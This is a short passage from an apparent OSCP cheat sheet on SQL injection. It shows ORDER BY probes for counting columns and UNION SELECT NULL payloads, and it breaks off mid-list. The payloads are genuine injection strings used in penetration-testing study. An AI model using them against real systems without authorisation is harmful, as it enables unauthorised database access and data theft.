jonnyzar/OSCP_CheatSheets/Cheat_Sheets/sql_cheatsheet.md

 ...
 1' order by 7; -- -- ok
 1' order by 8; -- -- error -> 7 columns available

+' UNION SELECT NULL--
+' UNION SELECT NULL,NULL--
+' UNION SELECT NULL,NULL,NULL--

+#using NULL is benficial if it is not certain if data types in columns match

 ```
 Other faster methods (if error messages are enabled):